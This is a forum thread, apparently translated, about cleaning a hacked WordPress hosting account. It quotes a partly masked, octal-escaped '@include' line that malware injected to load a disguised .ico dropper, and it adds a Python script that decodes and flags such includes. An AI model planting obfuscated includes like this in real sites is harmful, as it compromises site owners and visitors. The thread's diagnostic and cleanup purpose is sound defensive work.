JavaScript
sputnickk, 2019-03-17 10:52:59

How to decode a malicious script?

Hello! Guys, tell me how to determine the source of the virus.
There is a hosting account with 3 WP sites, and at intervals the following insert appears in the index.php file in the root of one of the sites:

@include "\****\167w\***\141n\144o\162_\154i\1562\*\1544e\1646k\*\1643t\0456c\157m\057w\160-\141d\155i\156/\156e\164w\157r\153/\056c\0658\1457\0711\063.\151c\157";

I decode this code using https://malwaredecoder.com/ and see the path to the virus file, the contents of which are here: https://i.imgur.com/dkslnSo.png
But these are percent symbols and numbers that I couldn't figure out how to decode; it seems similar to URL encoding, but it is not. As I understand it, the function of this file is to then create random files like this in the root of the sites, start34.php, with the content https://i.imgur.com/Hsyusb8.png. That is, the sabotage consists of these three parts.
I tried to download all the sites and go through them with evisium.com/kb/scan_site_windows.html; it found a lot of everything, I deleted it, but this rubbish still appears. I exported database dumps and searched for base64 and Evil entries, but the databases are clean.

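The include in the question hides its path with PHP octal escapes (\NNN) inside a double-quoted string. The Python sketch below is an added example, not part of the original thread: it decodes such literals and lists include/require statements whose path is escaped. It goes slightly beyond the post by also handling \xHH hex escapes. The sample PHP source and both paths in it are constructed for illustration.

```python
import re

# PHP double-quoted escapes handled here: \NNN octal, \xHH hex, single-char.
_ESC = re.compile(r'\\([0-7]{1,3}|x[0-9A-Fa-f]{1,2}|.)', re.S)
_SIMPLE = {"n": "\n", "t": "\t", "r": "\r", "v": "\v", "f": "\f",
           "e": "\x1b", "\\": "\\", "$": "$", '"': '"'}
# include/require followed by one double-quoted literal (single-quoted
# PHP strings do not expand these escapes, so they are not matched).
_INC = re.compile(r'\b(include_once|include|require_once|require)\b'
                  r'\s*\(?\s*"((?:[^"\\]|\\.)*)"', re.I | re.S)

def decode_php_dq(body):
    """Decode escape sequences in the body of a PHP double-quoted string."""
    def sub(m):
        tok = m.group(1)
        if tok[0] in "01234567":
            return chr(int(tok, 8) & 0xFF)      # PHP keeps only the low byte
        if tok[0] == "x" and len(tok) > 1:
            return chr(int(tok[1:], 16))
        return _SIMPLE.get(tok, "\\" + tok)     # unknown escapes stay literal
    return _ESC.sub(sub, body)

def find_obfuscated_includes(php_source):
    """Return (line, keyword, decoded_path) for includes whose path is escaped."""
    hits = []
    for m in _INC.finditer(php_source):
        body = m.group(2)
        if re.search(r'\\(?:[0-7]|x[0-9A-Fa-f])', body):
            line = php_source.count("\n", 0, m.start()) + 1
            hits.append((line, m.group(1).lower(), decode_php_dq(body)))
    return hits

# Constructed sample, not the file from the thread; both paths are made up.
SAMPLE = r'''<?php
@include "\057s\162v\057e\170a\155p\154e\057w\160-\141d\155i\156/\056x\061.\151c\157";
require_once "\x2ftmp\x2f.cache.php";
require "wp-load.php";
'''

if __name__ == "__main__":
    for line, keyword, path in find_obfuscated_includes(SAMPLE):
        print(f"line {line}: {keyword} -> {path!r}")
```

Running the same function over every .php file of a site gives a list of injected includes and the dropper files they point to, which can then be checked against a clean copy of the WordPress source.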

2 answer(s)
lamer350, 2019-03-17
@lamer350

You can’t track it all manually; go to virudie and scan all the files.

OnYourLips, 2019-03-17
@OnYourLips

and with some periodicity in the index.php file of the root of one of the sites appears

Doesn't that bother you too much?
After a hack you need to clean everything and install from the source, because the system is compromised.
And separate the sites into different containers, so they won’t get access to all of them through one.
